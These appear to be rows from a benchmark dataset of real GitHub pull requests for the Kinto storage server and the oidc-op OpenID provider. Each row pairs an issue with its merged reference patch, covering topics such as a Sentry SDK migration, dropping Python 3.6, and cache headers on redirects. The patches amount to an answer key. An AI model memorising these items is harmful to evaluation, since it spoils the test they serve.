@@ -264,6 +269,34 @@ def setup_cache(config):
config.registry.heartbeats["cache"] = heartbeat
+def setup_sentry(config):
+ settings = config.get_settings()
+
+ # Note: SENTRY_DSN and SENTRY_ENV env variables will override
+ # .ini values thanks to `load_default_settings()`.
+
+ dsn = settings["sentry_dsn"]
+ if dsn:
+ env_options = {}
+ env = settings["sentry_env"]
+ if env:
+ env_options["environment"] = env
+
+ sentry_sdk.init(
+ dsn,
+ integrations=[
+ PyramidIntegration(),
+ ],
+ **env_options,
+ )
+
+ def on_app_created(event):
+ msg = "Running {project_name} {project_version}.".format_map(settings)
+ sentry_sdk.capture_message(msg, "info")
+
+ config.add_subscriber(on_app_created, ApplicationCreated)
+
+
def setup_statsd(config):
settings = config.get_settings()
config.registry.statsd = None
diff --git a/requirements.txt b/requirements.txt
index 00a7c005e..dd354535d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -14,7 +14,7 @@ pyramid-multiauth==1.0.1
pyramid-tm==2.5
python-dateutil==2.8.2
python-memcached==1.59
-raven==6.10.0
+sentry-sdk==1.9.10
requests==2.28.1
SQLAlchemy==1.4.41
statsd==3.3.0
diff --git a/setup.cfg b/setup.cfg
index f8bba467f..b1b377678 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -77,7 +77,7 @@ postgresql =
zope.sqlalchemy
monitoring =
newrelic
- raven
+ sentry-sdk
statsd
werkzeug
diff --git a/tox.ini b/tox.ini
index e7723bc63..030cb0884 100644
--- a/tox.ini
+++ b/tox.ini
@@ -13,7 +13,7 @@ deps =
-r{toxinidir}/dev-requirements.txt
psycopg2
newrelic
- raven
+ sentry-sdk
statsd
install_command = pip install {opts} {packages} -c{toxinidir}/requirements.txt
| Replace `raven` by `sentry-python`
`raven` is deprecated; we should replace it with the maintained library.
https://github.com/getsentry/raven-python#readme
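The conditional option-building done in the `setup_sentry` initializer in the patch above can be isolated into a small pure function for clarity. This is an illustrative sketch — the helper name `build_sentry_options` is hypothetical; in the patch the options are passed straight to `sentry_sdk.init`:

```python
def build_sentry_options(settings):
    # Mirror setup_sentry(): report to Sentry only when a DSN is configured,
    # and only pass `environment` along when sentry_env is set.
    dsn = settings.get("sentry_dsn")
    if not dsn:
        return None
    options = {"dsn": dsn}
    env = settings.get("sentry_env")
    if env:
        options["environment"] = env
    return options

# With the defaults from kinto/core/__init__.py, reporting stays disabled.
print(build_sentry_options({"sentry_dsn": None, "sentry_env": None}))  # None
print(build_sentry_options({"sentry_dsn": "https://[email protected]/1",
                            "sentry_env": "prod"}))
```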
| 2022-10-10T17:27:18 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-2883 | ea84d96f4232b1177b6204533d5ef5697085ba52 | diff --git a/Dockerfile b/Dockerfile
index fba79d891..0dd0fea0c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,5 +1,5 @@
# Mozilla Kinto server
-FROM python:3.7-slim
+FROM python:3.10-slim
RUN groupadd --gid 10001 app && \
useradd --uid 10001 --gid 10001 --home /app --create-home app
diff --git a/README.rst b/README.rst
index 53c084373..6e6e1ff14 100644
--- a/README.rst
+++ b/README.rst
@@ -38,5 +38,5 @@ Kinto is a minimalist JSON storage service with synchronisation and sharing abil
Requirements
------------
-* **Python**: 3.6+
+* **Python**: 3.7+
* **Backends**: In-memory (development), PostgreSQL 9.5+ (production)
diff --git a/kinto/core/utils.py b/kinto/core/utils.py
index 26213efc0..9244c4b75 100644
--- a/kinto/core/utils.py
+++ b/kinto/core/utils.py
@@ -1,4 +1,4 @@
-import collections
+import collections.abc as collections_abc
import hashlib
import hmac
import os
@@ -172,7 +172,7 @@ def dict_subset(d, keys):
for key in keys:
if "." in key:
field, subfield = key.split(".", 1)
- if isinstance(d.get(field), collections.Mapping):
+ if isinstance(d.get(field), collections_abc.Mapping):
subvalue = dict_subset(d[field], [subfield])
result[field] = dict_merge(subvalue, result.get(field, {}))
elif field in d:
@@ -188,7 +188,7 @@ def dict_merge(a, b):
"""Merge the two specified dicts"""
result = dict(**b)
for key, value in a.items():
- if isinstance(value, collections.Mapping):
+ if isinstance(value, collections_abc.Mapping):
value = dict_merge(value, result.setdefault(key, {}))
result[key] = value
return result
diff --git a/setup.cfg b/setup.cfg
index a387598b8..27a7b9057 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,9 @@ classifiers =
Programming Language :: Python :: 3
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
+ Programming Language :: Python :: 3.8
+ Programming Language :: Python :: 3.9
+ Programming Language :: Python :: 3.10
Programming Language :: Python :: Implementation :: CPython
Topic :: Internet :: WWW/HTTP
Topic :: Internet :: WWW/HTTP :: WSGI :: Application
diff --git a/tox.ini b/tox.ini
index 259cdc462..a8eb40f20 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
[tox]
-envlist = py36,py36-raw,py37,py38,py39
+envlist = py37,py38,py38-raw,py39,py10
skip_missing_interpreters = True
requires =
virtualenv >= 20.2.2
@@ -17,7 +17,7 @@ deps =
statsd
install_command = pip install {opts} {packages} -c{toxinidir}/requirements.txt
-[testenv:py36-raw]
+[testenv:py38-raw]
passenv = TRAVIS CI
commands =
python --version
| Make a plan to drop Python 3.6 compatibility after it reaches EOL
Python 3.6 [is scheduled](https://devguide.python.org/#status-of-python-branches) to reach end-of-life (EOL) status later this year on 2021-12-23. We should consider if/when we want to follow suit and drop 3.6 compatibility from Kinto.
| Let's drop support for Python 3.6, feel free to start a PR about this removal.
I guess we can also make sure to support both Python 3.9 and Python 3.10 in the meantime.
| 2021-10-15T10:41:28 | 0.0 | [] | [] |
||
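The `collections.Mapping` → `collections.abc.Mapping` change in the patch above is what makes `dict_merge` work on Python 3.10, where the ABC aliases were removed from the `collections` namespace. A minimal sketch of the portable import, reusing the merge logic from `kinto/core/utils.py`:

```python
# collections.Mapping was removed in Python 3.10; the ABCs live in
# collections.abc (available since Python 3.3), so alias that instead.
import collections.abc as collections_abc


def dict_merge(a, b):
    """Recursively merge dict ``a`` into a copy of ``b`` (as in kinto.core.utils)."""
    result = dict(**b)
    for key, value in a.items():
        if isinstance(value, collections_abc.Mapping):
            # Nested mappings are merged rather than overwritten.
            value = dict_merge(value, result.setdefault(key, {}))
        result[key] = value
    return result


print(dict_merge({"a": {"x": 1}}, {"a": {"y": 2}, "b": 3}))
# → {'a': {'y': 2, 'x': 1}, 'b': 3}
```

The same import works unchanged on every Python version the PR targets (3.7–3.10).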
Kinto/kinto | Kinto__kinto-2880 | ea84d96f4232b1177b6204533d5ef5697085ba52 | diff --git a/.github/workflows/admin.yml b/.github/workflows/admin.yml
index ffbac82a6..39d99a4e0 100644
--- a/.github/workflows/admin.yml
+++ b/.github/workflows/admin.yml
@@ -7,7 +7,7 @@ on:
name: Kinto Admin
jobs:
chore:
- name: Build Kinto Admin
+ name: Kinto Admin
runs-on: ubuntu-latest
steps:
@@ -38,3 +38,26 @@ jobs:
run: |
source .venv/bin/activate
make build-kinto-admin
+
+ - name: geckodriver/firefox
+ run: |
+ echo "geckodriver/firefox"
+ which geckodriver
+ geckodriver --version
+ which firefox
+ firefox --version
+
+ - name: Install dependencies
+ run: |
+ source .venv/bin/activate
+ make install-dev
+
+ - name: Start Kinto
+ run: |
+ source .venv/bin/activate
+ kinto start --ini tests/browser.ini & sleep 5
+
+ - name: Browser Tests
+ run: |
+ source .venv/bin/activate
+ make browser-test
diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 8df363529..433fa3304 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,7 +6,13 @@ This document describes changes between each past release.
14.5.1 (unreleased)
-------------------
-- Nothing changed yet.
+**Bug fixes**
+
+- Fix bundle of kinto-admin, using same versions of React as upstream package #GroundhogDay
+
+**Internal Changes**
+
+- Add Selenium tests to detect Admin UI packaging issues (#2880)
14.5.0 (2021-10-08)
diff --git a/Makefile b/Makefile
index 60535ccb5..2b523dffb 100644
--- a/Makefile
+++ b/Makefile
@@ -29,6 +29,7 @@ help:
@echo " tdd run pytest-watch to rerun tests automatically on changes for tdd"
@echo " tests-once only run the tests once with the default python interpreter"
@echo " functional run functional test against a real kinto"
+ @echo " browser-test run browser test against a real kinto"
@echo " clean remove *.pyc files and __pycache__ directory"
@echo " distclean remove *.egg-info files and *.egg, build and dist directories"
@echo " maintainer-clean remove the .tox and the .venv directories"
@@ -109,6 +110,9 @@ runkinto: install-dev
functional: install-dev need-kinto-running
$(VENV)/bin/py.test tests/functional.py
+browser-test: need-kinto-running
+ $(VENV)/bin/py.test tests/browser.py
+
clean:
find . -name '*.pyc' -delete
find . -name '__pycache__' -type d | xargs rm -fr
diff --git a/dev-requirements.txt b/dev-requirements.txt
index 6571b7025..f32950500 100644
--- a/dev-requirements.txt
+++ b/dev-requirements.txt
@@ -7,10 +7,11 @@ pytest-cache==1.0
pytest-cov==3.0.0
pytest-watch==4.2.0
python-memcached==1.59
+selenium==3.141.0
swagger-spec-validator==2.7.3
therapist==2.2.0
tox==3.24.4
WebTest==3.0.0
wheel==0.37.0
zest.releaser==6.22.1
-zope.sqlalchemy==1.6
+zope.sqlalchemy==1.6
\ No newline at end of file
diff --git a/docs/community.rst b/docs/community.rst
index 3d478d529..f54da34f7 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -223,6 +223,49 @@ For example:
.venv/bin/pip install -e ../cornice/
+Functional Tests
+----------------
+
+In a terminal, run an instance with the provided ``functional.ini`` configuration:
+
+::
+
+ make runkinto
+
+In another terminal, run the end-to-end tests with:
+
+::
+
+ make functional
+
+
+Browser Tests
+-------------
+
+Make sure the `geckodriver <https://github.com/mozilla/geckodriver/releases>`_ binary is available in your path.
+
+.. note::
+
+ If your installation of *Firefox* is custom, specify the path of its binary using an alias:
+
+ ::
+
+ alias geckodriver="geckodriver --binary /path/to/firefox"
+
+
+In a terminal, run an instance with the provided ``browser.ini`` configuration:
+
+::
+
+ kinto start --ini tests/browser.ini
+
+In another terminal, run the end-to-end tests with:
+
+::
+
+ make browser-test
+
+
Cleaning your environment
-------------------------
diff --git a/kinto/plugins/admin/package-lock.json b/kinto/plugins/admin/package-lock.json
index 68beedd62..ed7bc2768 100644
--- a/kinto/plugins/admin/package-lock.json
+++ b/kinto/plugins/admin/package-lock.json
@@ -12,8 +12,8 @@
"codemirror": "^5.63.1",
"kinto-admin": "1.30.2",
"lodash.isequalwith": "^4.4.0",
- "react": "^17.0.2",
- "react-dom": "^17.0.2",
+ "react": "^16.8.6",
+ "react-dom": "^16.8.6",
"react-router": "^5.2.1",
"redux": "^4.1.1",
"typescript": "^4.4.3"
@@ -14564,42 +14564,6 @@
"react": ">=15"
}
},
- "node_modules/kinto-admin/node_modules/react": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
- "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2"
- },
- "engines": {
- "node": ">=0.10.0"
- }
- },
- "node_modules/kinto-admin/node_modules/react-dom": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
- "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2",
- "scheduler": "^0.19.1"
- },
- "peerDependencies": {
- "react": "^16.14.0"
- }
- },
- "node_modules/kinto-admin/node_modules/scheduler": {
- "version": "0.19.1",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
- "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
- }
- },
"node_modules/kinto-http": {
"version": "5.3.0",
"resolved": "https://registry.npmjs.org/kinto-http/-/kinto-http-5.3.0.tgz",
@@ -18292,12 +18256,13 @@
}
},
"node_modules/react": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz",
- "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
+ "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
"dependencies": {
"loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
+ "object-assign": "^4.1.1",
+ "prop-types": "^15.6.2"
},
"engines": {
"node": ">=0.10.0"
@@ -18811,16 +18776,17 @@
"integrity": "sha512-I+vcaK9t4+kypiSgaiVWAipqHRXYmZIuAiS8vzFvXHHXVigg/sMKwlRgLy6LH2i3rmP+0Vzfl5lFsFRwF1r3pg=="
},
"node_modules/react-dom": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz",
- "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
+ "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
"dependencies": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1",
- "scheduler": "^0.20.2"
+ "prop-types": "^15.6.2",
+ "scheduler": "^0.19.1"
},
"peerDependencies": {
- "react": "17.0.2"
+ "react": "^16.14.0"
}
},
"node_modules/react-error-overlay": {
@@ -20221,9 +20187,9 @@
}
},
"node_modules/scheduler": {
- "version": "0.20.2",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz",
- "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==",
+ "version": "0.19.1",
+ "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
+ "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
"dependencies": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1"
@@ -35858,38 +35824,6 @@
"redux-saga": "^1.1.3",
"rimraf": "^3.0.0",
"timeago.js": "^4.0.0"
- },
- "dependencies": {
- "react": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
- "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2"
- }
- },
- "react-dom": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
- "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2",
- "scheduler": "^0.19.1"
- }
- },
- "scheduler": {
- "version": "0.19.1",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
- "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
- }
- }
}
},
"kinto-admin-form": {
@@ -38892,12 +38826,13 @@
}
},
"react": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz",
- "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
+ "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
"requires": {
"loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
+ "object-assign": "^4.1.1",
+ "prop-types": "^15.6.2"
}
},
"react-app-polyfill": {
@@ -39296,13 +39231,14 @@
"integrity": "sha512-I+vcaK9t4+kypiSgaiVWAipqHRXYmZIuAiS8vzFvXHHXVigg/sMKwlRgLy6LH2i3rmP+0Vzfl5lFsFRwF1r3pg=="
},
"react-dom": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz",
- "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
+ "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
"requires": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1",
- "scheduler": "^0.20.2"
+ "prop-types": "^15.6.2",
+ "scheduler": "^0.19.1"
}
},
"react-error-overlay": {
@@ -40413,9 +40349,9 @@
}
},
"scheduler": {
- "version": "0.20.2",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz",
- "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==",
+ "version": "0.19.1",
+ "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
+ "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
"requires": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1"
diff --git a/kinto/plugins/admin/package.json b/kinto/plugins/admin/package.json
index 04e14d1b9..ec0a8b151 100644
--- a/kinto/plugins/admin/package.json
+++ b/kinto/plugins/admin/package.json
@@ -11,8 +11,8 @@
"codemirror": "^5.63.1",
"kinto-admin": "1.30.2",
"lodash.isequalwith": "^4.4.0",
- "react": "^17.0.2",
- "react-dom": "^17.0.2",
+ "react": "^16.8.6",
+ "react-dom": "^16.8.6",
"react-router": "^5.2.1",
"redux": "^4.1.1",
"typescript": "^4.4.3"
| Fix bundle of kinto-admin 1.30.2, using same versions of React as upstream
| 2021-10-14T08:43:56 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-2875 | eded5e3c35ca867dd6d18203a0aa001db4b5f515 | diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 1b4e5da37..2a039e218 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,7 +6,9 @@ This document describes changes between each past release.
14.5.0 (unreleased)
-------------------
-- Nothing changed yet.
+**New feature**
+
+- Add ``kinto.version_prefix_redirect_ttl_seconds`` setting in order to send ``Cache-Control`` response headers on version prefix redirects (fixes #2874)
14.4.1 (2021-09-20)
diff --git a/docs/configuration/settings.rst b/docs/configuration/settings.rst
index 1ab75d22b..2a3f6770e 100644
--- a/docs/configuration/settings.rst
+++ b/docs/configuration/settings.rst
@@ -1064,27 +1064,30 @@ If set to ``0`` then the resource becomes uncacheable (``no-cache``).
Project information
===================
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| Setting name | Default | What does it do? |
-+=======================================+============================================+==========================================================================+
-| kinto.version_json_path | ``./version.json`` | Location of the file containing the information to be shown in the |
-| | | :ref:`version endpoint <api-utilities-version>`. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.error_info_link | ``https://github.com/kinto/kinto/issues/`` | The HTTP link returned when uncaught errors are triggered on the server. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_docs | ``https://kinto.readthedocs.io`` | The URL where the documentation of the Kinto instance can be found. Will |
-| | | be returned in :ref:`the hello view <api-utilities>`. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_name | ``kinto`` | The name of your project (powered by Kinto) |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_version | ``''`` | The version of the project. Will be returned in :ref:`the hello view |
-| | | <api-utilities>`. By default, this is the major version of Kinto. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.version_prefix_redirect_enabled | ``True`` | By default, all endpoints exposed by Kinto are prefixed by a |
-| | | :ref:`version number <api-versioning>`. If this flag is enabled, the |
-| | | server will redirect all requests not matching the supported version |
-| | | to the supported one. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| Setting name | Default | What does it do? |
++=================================================+============================================+==========================================================================+
+| kinto.version_json_path | ``./version.json`` | Location of the file containing the information to be shown in the |
+| | | :ref:`version endpoint <api-utilities-version>`. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.error_info_link | ``https://github.com/kinto/kinto/issues/`` | The HTTP link returned when uncaught errors are triggered on the server. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_docs | ``https://kinto.readthedocs.io`` | The URL where the documentation of the Kinto instance can be found. Will |
+| | | be returned in :ref:`the hello view <api-utilities>`. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_name | ``kinto`` | The name of your project (powered by Kinto) |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_version | ``''`` | The version of the project. Will be returned in :ref:`the hello view |
+| | | <api-utilities>`. By default, this is the major version of Kinto. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.version_prefix_redirect_enabled | ``True`` | By default, all endpoints exposed by Kinto are prefixed by a |
+| | | :ref:`version number <api-versioning>`. If this flag is enabled, the |
+| | | server will redirect all requests not matching the supported version |
+| | | to the supported one. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.version_prefix_redirect_ttl_seconds | ``-1`` | Seconds specified in cache control headers on version prefix redirects. |
+| | | Set to ``-1`` to disable, and ``0`` to send ``no-cache`` explicitly. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
Example:
diff --git a/kinto/core/__init__.py b/kinto/core/__init__.py
index ba5a4cd3e..700bb43e9 100644
--- a/kinto/core/__init__.py
+++ b/kinto/core/__init__.py
@@ -83,6 +83,7 @@
"project_version": "",
"readonly": False,
"retry_after_seconds": 30,
+ "version_prefix_redirect_ttl_seconds": -1,
"settings_prefix": "",
"statsd_backend": "kinto.core.statsd",
"statsd_prefix": "kinto.core",
diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 8499d21a6..4d8a92517 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -74,6 +74,7 @@ def setup_version_redirection(config):
settings = config.get_settings()
redirect_enabled = settings["version_prefix_redirect_enabled"]
version_prefix_redirection_enabled = asbool(redirect_enabled)
+ cache_seconds = int(settings["version_prefix_redirect_ttl_seconds"])
route_prefix = config.route_prefix
config.registry.route_prefix = route_prefix
@@ -91,7 +92,10 @@ def _redirect_to_version_view(request):
querystring = request.url[(request.url.rindex(request.path) + len(request.path)) :]
redirect = f"/{route_prefix}{request.path}{querystring}"
- raise HTTPTemporaryRedirect(redirect)
+ resp = HTTPTemporaryRedirect(redirect)
+ if cache_seconds >= 0:
+ resp.cache_expires(cache_seconds)
+ raise resp
# Disable the route prefix passed by the app.
config.route_prefix = None
| Send cache control headers on version redirects
This would allow redirects to be cached at the CDN level
| 2021-10-07T11:10:08 | 0.0 | [] | [] |
|||
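The TTL semantics introduced by the patch above can be sketched as a small helper. This is a minimal illustration, not the actual implementation — the real code calls Pyramid's `response.cache_expires()` on the `HTTPTemporaryRedirect` — but the branch logic mirrors the setting: a negative value (the default, `-1`) sends no caching headers, zero sends an explicit `no-cache`, and a positive value lets a CDN cache the 307 redirect for that many seconds.

```python
def redirect_cache_headers(ttl_seconds: int) -> dict:
    """Headers to attach to a version-prefix redirect response.

    Mirrors kinto.version_prefix_redirect_ttl_seconds:
      < 0  -> caching headers disabled (default)
      == 0 -> explicit no-cache
      > 0  -> cacheable for that many seconds
    """
    if ttl_seconds < 0:
        return {}
    if ttl_seconds == 0:
        return {"Cache-Control": "no-cache"}
    return {"Cache-Control": f"max-age={ttl_seconds}"}


print(redirect_cache_headers(3600))  # → {'Cache-Control': 'max-age=3600'}
```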
IdentityPython/oidc-op | IdentityPython__oidc-op-184 | 7407cfab74def2886ab716f4ab38791538d2061b | diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 728a997..38400fc 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.4.0"
+__version__ = "2.4.1"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/oauth2/add_on/extra_args.py b/src/oidcop/oauth2/add_on/extra_args.py
index 68a8a84..ddfd3d4 100644
--- a/src/oidcop/oauth2/add_on/extra_args.py
+++ b/src/oidcop/oauth2/add_on/extra_args.py
@@ -1,3 +1,10 @@
+from oidcmsg.oauth2 import AccessTokenResponse
+from oidcmsg.oauth2 import AuthorizationResponse
+from oidcmsg.oauth2 import TokenExchangeResponse
+from oidcmsg.oauth2 import TokenIntrospectionResponse
+from oidcmsg.oidc import OpenIDSchema
+
+
def pre_construct(response_args, request, endpoint_context, **kwargs):
"""
Add extra arguments to the request.
@@ -11,12 +18,25 @@ def pre_construct(response_args, request, endpoint_context, **kwargs):
_extra = endpoint_context.add_on.get("extra_args")
if _extra:
- for arg, _param in _extra.items():
- _val = endpoint_context.get(_param)
+ if isinstance(response_args, AuthorizationResponse):
+ _args = _extra.get("authorization", {})
+ elif isinstance(response_args, AccessTokenResponse):
+ _args = _extra.get('accesstoken', {})
+ elif isinstance(response_args, TokenExchangeResponse):
+ _args = _extra.get('token_exchange', {})
+ elif isinstance(response_args, TokenIntrospectionResponse):
+ _args = _extra.get('token_introspection', {})
+ elif isinstance(response_args, OpenIDSchema):
+ _args = _extra.get('userinfo', {})
+ else:
+ _args = {}
+
+ for arg, _param in _args.items():
+ _val = getattr(endpoint_context, _param)
if _val:
- request[arg] = _val
+ response_args[arg] = _val
- return request
+ return response_args
def add_support(endpoint, **kwargs):
| A number of bug fixes and new functionality
| 2022-02-04T08:39:48 | 0.0 | [] | [] |
|||
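The `extra_args` add-on in the patch above dispatches on the response class to pick the right block of configured extra arguments, then copies attributes off the endpoint context into the response. A hypothetical standalone sketch of that dispatch (the class and config names here are illustrative, only the `{response category: {claim: context attribute}}` shape comes from the patch):

```python
class Context:
    """Stand-in for the endpoint context; ``issuer`` is an assumed attribute."""
    issuer = "https://op.example.org"


# Add-on configuration: per response category, map a response claim to a
# context attribute name (shape taken from the extra_args add-on).
EXTRA = {"authorization": {"iss": "issuer"}}


def apply_extra(category, response_args, context, extra=EXTRA):
    """Copy configured context attributes into the response arguments."""
    for arg, attr in extra.get(category, {}).items():
        val = getattr(context, attr, None)
        if val:
            response_args[arg] = val
    return response_args


print(apply_extra("authorization", {}, Context()))
# → {'iss': 'https://op.example.org'}
```

Categories with no configuration (e.g. `userinfo` here) leave the response untouched, matching the `_args = {}` fallback in the patch.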
IdentityPython/oidc-op | IdentityPython__oidc-op-182 | c2e09be571a02cf5203eafad3abc3afbcb893f67 | diff --git a/README.md b/README.md
index f412356c..3b39b93b 100644
--- a/README.md
+++ b/README.md
@@ -32,6 +32,7 @@ It also comes with the following `add_on` modules.
* [OAuth2 PAR](https://datatracker.ietf.org/doc/html/rfc9126)
* [OAuth2 RAR](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-rar)
* [OAuth2 DPoP](https://tools.ietf.org/id/draft-fett-oauth-dpop-04.html)
+* [OAuth 2.0 Authorization Server Issuer Identification](https://datatracker.ietf.org/doc/draft-ietf-oauth-iss-auth-resp)
The entire project code is open sourced and therefore licensed under the [Apache 2.0](https://en.wikipedia.org/wiki/Apache_License)
diff --git a/example/flask_op/server.py b/example/flask_op/server.py
index caada009..36ffd7b3 100755
--- a/example/flask_op/server.py
+++ b/example/flask_op/server.py
@@ -4,9 +4,10 @@
import logging
import os
-from oidcop.configure import Configuration
+from oidcmsg.configure import Configuration
